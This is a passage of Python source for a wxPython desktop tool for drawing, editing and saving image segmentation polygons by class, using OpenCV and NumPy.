_(\"Cancel\"))\r\n dialog.SetHelpLabel(_(\"Quit\"))\r\n except:\r\n dialog.setMessage(_(\"Cancel\"))\r\n dialogResult = dialog.ShowModal()\r\n result = []\r\n if dialogResult == wx.ID_YES:\r\n result = 'segment'\r\n elif dialogResult == wx.ID_NO:\r\n result = 'edit'\r\n else:\r\n result = 'quit'\r\n dialog.Destroy()\r\n return result\r\n\r\n\r\ndef selectFolder():\r\n style = wx.DD_DIR_MUST_EXIST | wx.DD_CHANGE_DIR\r\n # dialog = wx.DirDialog(None, \"Please choose image directory\", style)\r\n dialog = wx.DirDialog(None, \"Please choose image directory\", style=style)\r\n\r\n if dialog.ShowModal() == wx.ID_OK:\r\n result = dialog.GetPath()\r\n else:\r\n result = \"\"\r\n dialog.Destroy()\r\n return result\r\n\r\n\r\ndef getSingleFilePath(wildcard):\r\n style = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST\r\n dialog = wx.FileDialog(None, _('Open image'), wildcard=wildcard, style=style)\r\n if dialog.ShowModal() == wx.ID_OK:\r\n path = dialog.GetPath()\r\n else:\r\n path = None\r\n dialog.Destroy()\r\n return path\r\n\r\n\r\ndef bbox_np(img):\r\n rows = np.any(img, axis=1)\r\n cols = np.any(img, axis=0)\r\n rmin, rmax = np.where(rows)[0][[0, -1]]\r\n cmin, cmax = np.where(cols)[0][[0, -1]]\r\n\r\n return rmin, rmax, cmin, cmax\r\n\r\n\r\ndef drawSegmentationPolys(fromArea=0, current_seg=0, current_class=0, send_to_back=False, limits=(0, 0, 0, 0)):\r\n polygons_area = [item[0] for item in polygons]\r\n min_area = min(polygons_area)\r\n\r\n if min_area >= fromArea:\r\n # print('here!', min_area, fromArea)\r\n # print(polygons)\r\n # burn in only last one\r\n for idx_class in range(NUM_CLASSES):\r\n image_np_all_slices_segmentation[limits[0]:limits[1], limits[2]:limits[3], idx_class][\r\n np.where(current_seg[limits[0]:limits[1], limits[2]:limits[3]] > 0)] = 0\r\n image_np_all_slices_segmentation[limits[0]:limits[1], limits[2]:limits[3], current_class] = np.logical_or(\r\n image_np_all_slices_segmentation[limits[0]:limits[1], 
limits[2]:limits[3], current_class],\r\n current_seg[limits[0]:limits[1], limits[2]:limits[3]])\r\n else: # redraw from fromArea\r\n for poly in polygons:\r\n if poly[0] > fromArea:\r\n continue\r\n bw_poly = cv2.fillPoly(np.zeros((poly[3][1] - poly[3][0], poly[3][3] - poly[3][2])), [poly[2]], 255, 8, 0,\r\n (-poly[3][2], -poly[3][0]))\r\n for idx_class in range(NUM_CLASSES):\r\n image_np_all_slices_segmentation[poly[3][0]:poly[3][1], poly[3][2]:poly[3][3], idx_class][\r\n np.where(bw_poly > 0)] = 0\r\n image_np_all_slices_segmentation[:, :, poly[1]][poly[3][0]:poly[3][1],\r\n poly[3][2]:poly[3][3]] = np.logical_or(\r\n image_np_all_slices_segmentation[poly[3][0]:poly[3][1], poly[3][2]:poly[3][3], poly[1]], bw_poly)\r\n\r\n\r\ndef redrawSegmentationPolys(polygonss, highlighted=None):\r\n global image_np_all_slices_segmentation\r\n highlighted_poly = []\r\n if highlighted != None:\r\n highlighted_poly = polygonss[highlighted]\r\n polygonss = sorted(polygonss, reverse=True, key=lambda x: x[0])\r\n if highlighted != None:\r\n highlighted = polygonss.index(highlighted_poly)\r\n image_np_all_slices_segmentation = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, NUM_CLASSES), dtype=np.bool_)\r\n for idx_current_poly, poly in enumerate(polygonss):\r\n if highlighted != None:\r\n if idx_current_poly == highlighted:\r\n bw_poly = cv2.fillPoly(np.zeros((poly[3][1] - poly[3][0], poly[3][3] - poly[3][2])), [poly[2]], 255, 8,\r\n 0,\r\n (-poly[3][2], -poly[3][0]))\r\n else:\r\n bw_poly = cv2.drawContours(np.zeros((poly[3][1] - poly[3][0], poly[3][3] - poly[3][2])), [poly[2]], 0,\r\n 255, 5, 8, 0, 0, (-poly[3][2], -poly[3][0]))\r\n else:\r\n bw_poly = cv2.fillPoly(np.zeros((poly[3][1] - poly[3][0], poly[3][3] - poly[3][2])), [poly[2]], 255, 8, 0,\r\n (-poly[3][2], -poly[3][0]))\r\n #for idx_class in range(NUM_CLASSES):\r\n image_np_all_slices_segmentation[poly[3][0]:poly[3][1], poly[3][2]:poly[3][3], :][np.where(bw_poly > 0)] = 0\r\n\r\n image_np_all_slices_segmentation[:, :, poly[1]][poly[3][0]:poly[3][1], poly[3][2]:poly[3][3]] = np.logical_or(\r\n image_np_all_slices_segmentation[poly[3][0]:poly[3][1], poly[3][2]:poly[3][3], poly[1]], bw_poly)\r\n\r\n\r\ndef plotAnnotationsOverlay():\r\n rgb_overlay = plotAnnotations()\r\n img_out = np.zeros_like(rgb_overlay)\r\n if not HIDE_SEGMENTATION:\r\n cv2.addWeighted(rgb_overlay, 0.5, image_np_all_slices_normed, 1, 0, img_out)\r\n else:\r\n img_out = image_np_all_slices_normed\r\n return img_out\r\n\r\n\r\ndef plotAnnotations():\r\n rgb_overlay = np.zeros_like(image_np_all_slices_normed)\r\n for idx_class in range(NUM_CLASSES):\r\n rgb_overlay[image_np_all_slices_segmentation[:, :, idx_class] > 0] = CLASS_COLORS_RGB[idx_class]\r\n # print(np.count_nonzero(rgb_overlay))\r\n return rgb_overlay\r\n\r\n\r\ndef plotAnnotationsOverlay2(image_np_all_slices_normed_inside, image_np_all_slices_segmentation_inside):\r\n rgb_overlay = plotAnnotations2(image_np_all_slices_normed_inside, image_np_all_slices_segmentation_inside)\r\n img_out = np.zeros_like(rgb_overlay)\r\n cv2.addWeighted(rgb_overlay, 0.5, image_np_all_slices_normed_inside, 1, 0, img_out)\r\n return img_out\r\n\r\n\r\ndef plotAnnotations2(image_np_all_slices_normed_inside, image_np_all_slices_segmentation_inside):\r\n rgb_overlay = np.zeros_like(image_np_all_slices_normed_inside)\r\n labels_for_drawing = []\r\n for idx_class in range(NUM_CLASSES):\r\n rgb_overlay[image_np_all_slices_segmentation_inside[:, :, idx_class] > 0] = CLASS_COLORS_RGB[idx_class][::-1]\r\n return rgb_overlay\r\n\r\n# other helpers\r\n\r\ndef 
make_unique(original_list):\r\n unique_list = []\r\n map(lambda x: unique_list.append(x) if (x not in unique_list) else False, original_list)\r\n return unique_list\r\n\r\ndef removePolygonDuplicates(old_polygons):\r\n # add : polygons.append([current_area, self.selected_class, approxContourPoints, (rmin, rmax, cmin, cmax)])\r\n new_polygons = []\r\n for current_old_polygon in old_polygons:\r\n is_duplicate = False\r\n for current_new_polygon in new_polygons:\r\n if current_new_polygon[0] == current_old_polygon[0] and current_new_polygon[3][0] == current_old_polygon[3][0] and current_new_polygon[3][1] == current_old_polygon[3][1] and current_new_polygon[3][2] == current_old_polygon[3][2] and current_new_polygon[3][3] == current_old_polygon[3][3]:\r\n is_duplicate = True\r\n break\r\n if not is_duplicate:\r\n new_polygons.append(current_old_polygon)\r\n new_polygons = sorted(new_polygons, key=lambda x: x[0])\r\n return new_polygons\r\n\r\n###########################################################################\r\n## Python code generated with wxFormBuilder (version Jan 23 2018)\r\n## http://www.wxformbuilder.org/\r\n##\r\n## PLEASE DO *NOT* EDIT THIS FILE!\r\n###########################################################################\r\n\r\n\r\nclass PleaseWaitFrame(wx.Frame):\r\n\r\n def __init__(self, parent):\r\n wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=wx.EmptyString, pos=wx.DefaultPosition,\r\n size=wx.Size(500, 300), style=0 | wx.TAB_TRAVERSAL)\r\n\r\n self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)\r\n self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_BTNHIGHLIGHT))\r\n\r\n bSizer2 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n bSizer2.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n self.m_staticText2 = wx.StaticText(self, wx.ID_ANY, u\"Așteptați...\", wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_staticText2.Wrap(-1)\r\n\r\n bSizer2.Add(self.m_staticText2, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 5)\r\n\r\n bSizer2.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n self.SetSizer(bSizer2)\r\n self.Layout()\r\n\r\n self.Centre(wx.BOTH)\r\n\r\n def __del__(self):\r\n pass\r\n\r\n\r\n###########################################################################\r\n## Class drawing_panel\r\n###########################################################################\r\n\r\nclass drawing_panel(wx.Panel):\r\n def __init__(self, parent, original_image, drawing_style, brush_size):\r\n global operation_changed\r\n operation_changed = False\r\n self.parent = parent\r\n self.brushSize = brush_size\r\n # self.original_image = original_image.Rotate90(False)\r\n self.original_image = original_image\r\n self.resized_bitmap = original_image.ConvertToBitmap()\r\n self.contourPoints = []\r\n self.old_area = 0\r\n wx.Panel.__init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition, size=wx.Size(800, 800),\r\n style=wx.TAB_TRAVERSAL)\r\n self.isDrawing = False\r\n self.drawingStyle = drawing_style\r\n self.dc = wx.ClientDC(self)\r\n self.gc = wx.GraphicsContext.Create(self.dc)\r\n self.selected_class = 0\r\n\r\n self.Bind(wx.EVT_MOVE, self.OnMove)\r\n self.Bind(wx.EVT_MOTION, self.OnMouseMove)\r\n self.Bind(wx.EVT_PAINT, self.OnPaint)\r\n self.Bind(wx.EVT_SIZE, self.OnResize)\r\n self.Bind(wx.EVT_LEFT_DOWN, self.startDrawing)\r\n self.Bind(wx.EVT_LEFT_UP, self.endDrawing)\r\n self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)\r\n\r\n def paint(self, event=None):\r\n # print(\"paint\")\r\n dc = wx.PaintDC(self)\r\n dc.DrawBitmap(self.resized_bitmap, 0, 0, False);\r\n\r\n def OnMove(self, e):\r\n x, y = 
e.GetPosition()\r\n # print(\"current window position x = \", x, \" y= \", y)\r\n\r\n def OnMouseMove(self, e):\r\n if current_operation != 'edit':\r\n x, y = e.GetPosition()\r\n if self.isDrawing and self.drawingStyle == 'contour':\r\n self.contourPoints.append([x, y])\r\n if len(self.contourPoints) > 1:\r\n for idx, point in enumerate(self.contourPoints):\r\n if idx == len(self.contourPoints) - 1: # last point\r\n continue\r\n # self.gc.DrawLines(self.contourPoints[-2:-1])\r\n self.dc.DrawLine(self.contourPoints[-1][0], self.contourPoints[-1][1],\r\n self.contourPoints[-2][0], self.contourPoints[-2][1])\r\n elif self.isDrawing and self.drawingStyle == 'brush':\r\n self.contourPoints.append([x, y])\r\n\r\n # dc.SetBrush(wx.Brush(\"red\", wx.SOLID))\r\n # dc.SetPen(wx.Pen(\"red\", self.brushSize, style=wx.SOLID))\r\n\r\n if len(self.contourPoints) > 1:\r\n self.dc.DrawLine(self.contourPoints[-1][0], self.contourPoints[-1][1],\r\n self.contourPoints[-2][0], self.contourPoints[-2][1])\r\n # write seg @ mouse up\r\n\r\n elif self.isDrawing and self.drawingStyle == 'brushDelete':\r\n self.contourPoints.append([x, y])\r\n\r\n if len(self.contourPoints) > 1:\r\n # self.dc.DrawLine(self.contourPoints[-1][0], self.contourPoints[-1][1],\r\n # self.contourPoints[-2][0], self.contourPoints[-2][1])\r\n # self.dc = wx.ClientDC(self) #batman\r\n self.gc.DrawLines(self.contourPoints)\r\n # write seg @ mouse up\r\n # current_segmentation = self.getCurrentSegmentation()\r\n # print(np.count_nonzero(current_segmentation == [255,255,255]))\r\n\r\n # dc.DrawCircle(x, y, 1)\r\n # print(\"current panel mouse position x = \", x, \" y= \", y)\r\n\r\n def changeImage(self, new_image):\r\n self.dc = wx.ClientDC(self) # batman\r\n self.gc = wx.GraphicsContext.Create(self.dc) # batman\r\n self.original_image = new_image\r\n # self.original_image = new_image\r\n self.redrawImage()\r\n\r\n def OnPaint(self, event):\r\n self.redrawImage()\r\n\r\n def OnResize(self, event):\r\n self.redrawImage()\r\n self.dc.SetPen(wx.Pen(wx.Colour(CLASS_COLORS_RGB[self.selected_class]), style=wx.SOLID))\r\n self.gc.SetBrush(wx.Brush(\r\n wx.Colour(CLASS_COLORS_RGB[self.selected_class][0], CLASS_COLORS_RGB[self.selected_class][1],\r\n CLASS_COLORS_RGB[self.selected_class][2], 125), wx.SOLID))\r\n new_w, new_h = self.dc.GetSize()\r\n rescaled_contour_points = []\r\n for point in self.contourPoints:\r\n rescaled_contour_points.append([int(point[0] * IMAGE_WIDTH / new_w), int(point[1] * IMAGE_HEIGHT / new_h)])\r\n self.contourPoints = rescaled_contour_points\r\n\r\n def OnCloseWindow(self, e):\r\n global operation_changed\r\n operation_changed = False\r\n\r\n def redrawImage(self):\r\n self.dc = wx.ClientDC(self) # batman\r\n new_w, new_h = self.dc.GetSize()\r\n if new_w != 0 and new_h != 0:\r\n self.resized_bitmap = self.original_image.Scale(new_w, new_h).ConvertToBitmap()\r\n self.dc.DrawBitmap(self.resized_bitmap, 0, 0);\r\n\r\n def startDrawing(self, e):\r\n if current_operation != 'edit':\r\n x, y = e.GetPosition()\r\n self.isDrawing = True\r\n self.contourPoints.append([x, y])\r\n if self.isDrawing and self.drawingStyle == 'contour':\r\n self.dc.SetPen(wx.Pen(wx.Colour(CLASS_COLORS_RGB[self.selected_class]), style=wx.SOLID))\r\n self.gc.SetBrush(wx.Brush(\r\n wx.Colour(CLASS_COLORS_RGB[self.selected_class][0], CLASS_COLORS_RGB[self.selected_class][1],\r\n CLASS_COLORS_RGB[self.selected_class][2], 125), wx.SOLID))\r\n # self.gc.BeginLayer(125)\r\n elif self.isDrawing and self.drawingStyle == 'brushDelete':\r\n 
self.dc.SetBrush(wx.Brush(\"white\", wx.SOLID))\r\n self.dc.SetPen(wx.Pen(\"white\", self.brushSize, style=wx.SOLID))\r\n elif self.isDrawing and self.drawingStyle == 'brush':\r\n self.dc.SetBrush(wx.Brush(\"red\", wx.SOLID))\r\n self.dc.SetPen(wx.Pen(\"red\", self.brushSize, style=wx.SOLID))\r\n\r\n def endDrawing(self, e=None):\r\n global FIRST_CLICK\r\n global polygons_to_be_deleted\r\n if FIRST_CLICK:\r\n FIRST_CLICK = False\r\n return\r\n if current_operation != 'edit':\r\n # x, y = e.GetPosition()\r\n self.isDrawing = False\r\n # this should change depending on the drawing type but, hell, pre-alpha\r\n if self.drawingStyle == 'points':\r\n # draw points\r\n self.redrawImage()\r\n dc = wx.ClientDC(self)\r\n # dc.BeginDrawing()\r\n dc.SetPen(wx.Pen(\"green\", style=wx.SOLID))\r\n dc.SetBrush(wx.Brush(\"green\", wx.SOLID))\r\n for point in self.contourPoints:\r\n dc.DrawCircle(point[0], point[1], 3)\r\n if len(self.contourPoints) > 2:\r\n # ch = ConvexHull(np.array(self.contourPoints))\r\n # Get the indices of the hull points.\r\n # hull_indices = ch.vertices\r\n\r\n # These are the actual points.\r\n # hull_pts = self.contourPoints[hull_indices, :]\r\n # draw lines\r\n dc.SetPen(wx.Pen(CLASS_COLORS_RGB[self.selected_class], style=wx.SOLID))\r\n\r\n for idx, current_hull_index in enumerate(hull_indices):\r\n if idx == len(hull_indices) - 1:\r\n dc.DrawLine(self.contourPoints[hull_indices[idx]][0],\r\n self.contourPoints[hull_indices[idx]][1],\r\n self.contourPoints[hull_indices[0]][0], self.contourPoints[hull_indices[0]][1])\r\n else:\r\n dc.DrawLine(self.contourPoints[hull_indices[idx]][0],\r\n self.contourPoints[hull_indices[idx]][1],\r\n self.contourPoints[hull_indices[idx + 1]][0],\r\n self.contourPoints[hull_indices[idx + 1]][1])\r\n # plt.plot(pts[:, 0], pts[:, 1], 'ko', markersize=10)\r\n # plt.fill(hull_pts[:, 0], hull_pts[:, 1], fill=False, edgecolor='b')\r\n elif self.drawingStyle == 'contour':\r\n # draw last point\r\n self.redrawImage()\r\n\r\n # dc = wx.ClientDC(self)\r\n # dc.SetPen(wx.Pen(\"red\", style=wx.SOLID))\r\n # dc.DrawLine(self.contourPoints[-1][0], self.contourPoints[-1][1],\r\n # self.contourPoints[0][0], self.contourPoints[0][1])\r\n # fill contour\r\n # self.dc = wx.ClientDC(self)\r\n # self.gc = wx.GraphicsContext.Create(self.dc)\r\n self.dc.SetPen(wx.Pen(CLASS_COLORS_RGB[self.selected_class], style=wx.SOLID))\r\n\r\n self.gc.SetBrush(wx.Brush(\r\n wx.Colour(CLASS_COLORS_RGB[self.selected_class][0], CLASS_COLORS_RGB[self.selected_class][1],\r\n CLASS_COLORS_RGB[self.selected_class][2], 125), wx.SOLID))\r\n if len(self.contourPoints) > 1:\r\n self.gc.DrawLines(self.contourPoints)\r\n self.dc.DrawLines(self.contourPoints)\r\n # self.gc.DrawLines(self.contourPoints)\r\n # self.dc.DrawLines(self.contourPoints)\r\n elif current_operation == 'edit':\r\n x, y = e.GetPosition()\r\n print('here', x, y)\r\n new_w, new_h = self.dc.GetSize()\r\n x_scaled, y_scaled = (int(x * IMAGE_WIDTH / new_w), int(y * IMAGE_HEIGHT / new_h))\r\n #if polygons_to_be_deleted == []:\r\n for current_polygon in polygons:\r\n if cv2.pointPolygonTest(current_polygon[2], (x_scaled, y_scaled), True) > 0:\r\n polygons_to_be_deleted.append(current_polygon)\r\n #polygons_to_be_deleted = removePolygonDuplicates(polygons_to_be_deleted)\r\n print('appended')\r\n redrawSegmentationPolys(polygons_to_be_deleted, highlighted=0)\r\n self.parent.PrepAndChangeImage(plotAnnotationsOverlay())\r\n if len(polygons_to_be_deleted) > 0:\r\n self.parent.m_button31b.Enable()\r\n self.parent.m_button3.Enable()\r\n 
self.parent.m_choiceClass.Enable()\r\n self.parent.m_choiceClass.SetSelection(polygons_to_be_deleted[0][1])\r\n self.parent.m_button31c.Enable()\r\n if len(polygons_to_be_deleted) > 1:\r\n self.parent.m_button31p.Enable()\r\n self.parent.m_button31n.Enable()\r\n\r\n # self.clear()\r\n # self.parent.PrepAndChangeImage(self.parent.current_slice)\r\n\r\n def deleteLastVertex(self):\r\n self.contourPoints = self.contourPoints[:-1]\r\n self.endDrawing()\r\n\r\n def setDrawingStyle(self, drawing_style):\r\n self.drawingStyle = drawing_style\r\n\r\n def clear(self):\r\n dc = wx.ClientDC(self)\r\n dc.Clear()\r\n self.contourPoints = []\r\n self.redrawImage()\r\n\r\n def getCurrentSegmentation(self):\r\n dc = wx.ClientDC(self)\r\n img = self.saveSnapshot(dc)\r\n buf = img.GetDataBuffer() # use img.GetAlphaBuffer() for alpha data\r\n arr = np.frombuffer(buf, dtype='uint8')\r\n arr = np.reshape(arr, (dc.Size.height, dc.Size.width, 3)) # hardcoded num channels :/\r\n image = np.zeros_like(arr)\r\n image[np.where((arr == [255, 0, 0]).all(axis=2))] = [255, 255, 255]\r\n image[np.where((arr == [255, 255, 255]).all(axis=2))] = [255, 255, 255]\r\n image = cv2.rotate(image, 0)\r\n image_resized = cv2.resize(image, (self.original_image.Height, self.original_image.Width))\r\n return image_resized\r\n\r\n def savePolygon(self):\r\n global polygons\r\n if len(self.contourPoints) == 0:\r\n return\r\n # self.dc = wx.ClientDC(self) #batman\r\n new_w, new_h = self.dc.GetSize()\r\n rescaled_contour_points = []\r\n for point in self.contourPoints:\r\n rescaled_contour_points.append([int(point[0] * IMAGE_WIDTH / new_w), int(point[1] * IMAGE_HEIGHT / new_h)])\r\n\r\n if self.drawingStyle == 'contour':\r\n print('saved contour')\r\n send_to_back = self.parent.checkBox1.GetValue()\r\n print(image_np_all_slices_segmentation[:, :, self.selected_class].shape)\r\n approxContourPoints = cv2.approxPolyDP(np.asarray(rescaled_contour_points), 1, closed=True)\r\n\r\n bw_poly = cv2.fillPoly(np.zeros_like(image_np_all_slices_normed[:, :, 0]), [approxContourPoints], 255,\r\n 8) > 0\r\n\r\n current_area = np.count_nonzero(bw_poly)\r\n\r\n rmin, rmax, cmin, cmax = bbox_np(bw_poly)\r\n\r\n self.old_area = current_area\r\n old_area_list.append(current_area)\r\n\r\n if send_to_back:\r\n for idx_class in range(NUM_CLASSES):\r\n bw_poly[np.where(image_np_all_slices_segmentation[:, :, idx_class] > 0)] = 0\r\n # cv2.imwrite('out_bw_poly.png', np.array(bw_poly*255, dtype=np.uint8))\r\n contours, hierarchy = cv2.findContours(np.array(bw_poly, dtype=np.uint8), cv2.RETR_LIST,\r\n cv2.CHAIN_APPROX_SIMPLE)\r\n contours = sorted(contours, key=lambda x: cv2.contourArea(x), reverse=True)\r\n for cnt in contours:\r\n approxContourPoints = cv2.approxPolyDP(np.asarray(cnt), 1, closed=True)\r\n print(cnt)\r\n print('problem here')\r\n break\r\n # check dealbreaker\r\n \"\"\" \r\n if self.selected_class != 4 and self.selected_class != 7:\r\n avg_p_x = 0\r\n avg_p_y = 0\r\n for p in approxContourPoints:\r\n avg_p_x+=p[0][0]\r\n avg_p_y+=p[0][1]\r\n avg_p_x /=len(approxContourPoints)\r\n avg_p_y /=len(approxContourPoints)\r\n if cv2.pointPolygonTest(approxContourPoints, (avg_p_x, avg_p_y), True) < 0:\r\n style = wx.ICON_ERROR | wx.OK\r\n dialog = wx.MessageDialog(None, 'Polygon is not convex', 'Error', style)\r\n dialogResult = dialog.ShowModal()\r\n dialog.Destroy()\r\n self.contourPoints = []\r\n self.parent.PrepAndChangeImage(plotAnnotationsOverlay())\r\n return\r\n \"\"\"\r\n polygons.append([current_area, self.selected_class, approxContourPoints, 
(rmin, rmax, cmin, cmax)])\r\n polygons = sorted(polygons, reverse=True, key=lambda x: x[0])\r\n drawSegmentationPolys(fromArea=current_area, current_seg=bw_poly, current_class=self.selected_class,\r\n limits=(rmin, rmax, cmin, cmax))\r\n\r\n self.parent.PrepAndChangeImage(plotAnnotationsOverlay())\r\n self.contourPoints = []\r\n\r\n elif self.drawingStyle == 'brush':\r\n # approximate curve -- closed does NOT work, for whatever reason\r\n approxContourPoints = cv2.approxPolyDP(np.asarray(self.contourPoints), 1, closed=True)\r\n\r\n def saveSnapshot(self, dcSource):\r\n # based largely on code posted to wxpython-users by Andrea Gavana 2006-11-08\r\n size = dcSource.Size\r\n\r\n # Create a Bitmap that will later on hold the screenshot image\r\n # Note that the Bitmap must have a size big enough to hold the screenshot\r\n # -1 means using the current default colour depth\r\n bmp = wx.Bitmap(size.width, size.height) #\r\n\r\n # Create a memory DC that will be used for actually taking the screenshot\r\n memDC = wx.MemoryDC()\r\n\r\n # Tell the memory DC to use our Bitmap\r\n # all drawing action on the memory DC will go to the Bitmap now\r\n memDC.SelectObject(bmp)\r\n\r\n # Blit (in this case copy) the actual screen on the memory DC\r\n # and thus the Bitmap\r\n memDC.Blit(0, # Copy to this X coordinate\r\n 0, # Copy to this Y coordinate\r\n size.width, # Copy this width\r\n size.height, # Copy this height\r\n dcSource, # From where do we copy?\r\n 0, # What's the X offset in the original DC?\r\n 0 # What's the Y offset in the original DC?\r\n )\r\n\r\n # Select the Bitmap out of the memory DC by selecting a new\r\n # uninitialized Bitmap\r\n memDC.SelectObject(wx.NullBitmap)\r\n\r\n img = bmp.ConvertToImage()\r\n return img\r\n\r\n def __del__(self):\r\n pass\r\n\r\n\r\n###########################################################################\r\n## Class seg_frame\r\n###########################################################################\r\n\r\nclass seg_frame(wx.Frame):\r\n def __init__(self, parent, title):\r\n self._current_slice = 0\r\n self.num_slices_current_axis = NUM_SLICES\r\n wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=title, pos=wx.DefaultPosition,\r\n size=wx.Size(1280, 768), style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL, name=u\"Seg\")\r\n\r\n self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)\r\n\r\n bSizer1 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n bSizer2 = wx.BoxSizer(wx.HORIZONTAL)\r\n\r\n self.bSizer2Ext = bSizer2\r\n\r\n self.m_button5 = wx.Button(self, 83, _(\"Save frame\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n bSizer2.Add(self.m_button5, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n # if current_operation == 'segment':\r\n self.m_button6 = wx.Button(self, 84, _(\"Save current polygon\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button6.Hide()\r\n bSizer2.Add(self.m_button6, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n # if current_operation == 'segment':\r\n self.m_button31 = wx.Button(self, 81, _(\"Delete last vertex\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31.Hide()\r\n bSizer2.Add(self.m_button31, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_button3 = wx.Button(self, 80, _(\"Delete current polygon\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n if current_operation == 'edit':\r\n self.m_button3.Disable()\r\n self.m_button3.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n\r\n 
bSizer2.Add(self.m_button3, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n # if current_operation == 'segment':\r\n\r\n self.checkBox1 = wx.CheckBox(self, 201, _(\"Send to back\"))\r\n self.checkBox1.Hide()\r\n bSizer2.Add(self.checkBox1, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.checkBox2 = wx.CheckBox(self, 210, _(\"Hide seg\"))\r\n self.checkBox2.Hide()\r\n bSizer2.Add(self.checkBox2, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_button31x = wx.Button(self, 202, _(\"Undo polygon\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31x.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31x.Hide()\r\n bSizer2.Add(self.m_button31x, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n # edit mode\r\n # if current_operation == 'edit':\r\n self.m_button31p = wx.Button(self, 203, _(\"Previous polygon\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31p.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31p.Disable()\r\n self.m_button31p.Hide()\r\n\r\n bSizer2.Add(self.m_button31p, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_button31n = wx.Button(self, 204, _(\"Next polygon\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31n.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31n.Disable()\r\n self.m_button31n.Hide()\r\n\r\n bSizer2.Add(self.m_button31n, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_choiceClass = wx.Choice(self, 206, choices=CLASS_NAMES);\r\n self.m_choiceClass.Disable()\r\n self.m_choiceClass.Hide()\r\n\r\n bSizer2.Add(self.m_choiceClass, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_button31c = wx.Button(self, 207, _(\"Change class\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31c.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31c.Disable()\r\n self.m_button31c.Hide()\r\n\r\n bSizer2.Add(self.m_button31c, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.m_button31b = wx.Button(self, 205, _(\"Back to segmentation\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_button31b.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button31b.Disable()\r\n self.m_button31b.Hide()\r\n\r\n bSizer2.Add(self.m_button31b, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.rbox = wx.RadioBox(self, label=_(\"Mode\"), size= wx.DefaultSize, choices=operations_list_translated, majorDimension=1,\r\n style=wx.RA_SPECIFY_ROWS)\r\n self.rbox.SetSelection(operations_list.index(current_operation))\r\n self.rbox.Bind(wx.EVT_RADIOBOX, self.OnRadioBox)\r\n\r\n bSizer2.Add(self.rbox, 0, wx.ALL | wx.ALIGN_LEFT, 5)\r\n\r\n self.m_button111 = wx.Button(self, 208, _(\"Previous\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n bSizer2.Add(self.m_button111, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n self.m_button112 = wx.Button(self, 209, _(\"Next\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n bSizer2.Add(self.m_button112, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n bSizer1.Add(bSizer2, 0, wx.EXPAND, 5)\r\n\r\n self.bSizer81 = wx.BoxSizer(wx.HORIZONTAL)\r\n\r\n # if current_operation == 'segment':\r\n self.m_staticText121 = wx.StaticText(self, wx.ID_ANY, _(\"Draw class\"), wx.DefaultPosition, wx.DefaultSize, 0)\r\n self.m_staticText121.Wrap(-1)\r\n\r\n self.bSizer81.Add(self.m_staticText121, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n self.buttons_classes = []\r\n\r\n for idxx in 
